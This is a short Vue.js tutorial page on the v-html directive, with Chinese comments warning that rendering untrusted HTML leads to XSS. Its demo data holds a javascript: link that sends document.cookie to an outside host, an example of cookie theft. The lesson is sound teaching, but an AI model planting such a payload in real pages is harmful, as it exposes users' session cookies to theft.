<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script type="text/javascript" src="../js/vue.js"></script>
    <title>v-html指令</title>
</head>
<body>
    <!-- 
        v-html指令：
            1、作用：向指定节点渲染包含html结构的内容
            2、与插值语法的区别：
                （1）v-html会替换掉节点中所有的内容，{{xxx}}则不会
                （2）v-html可以识别html结构
            3、严重注意：v-html有安全问题
                （1）在网站上动态渲染任意HTML是非常危险的，容易导致XSS攻击
                （2）一定要在可信的内容上使用v-html，不用再用户提交内容上使用
     -->
    <div id="root">
       <div v-html="name"></div>
       <div v-html="unsafe"></div>
    </div>

    <script type="text/javascript">
        const vm = new Vue({
            el:"#root",
            data(){
                return {
                    name:"<h1>v-html</h1>",
                    unsafe:'<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>陷阱</a>'
                }
            }
        })

    </script>
</body>
</html>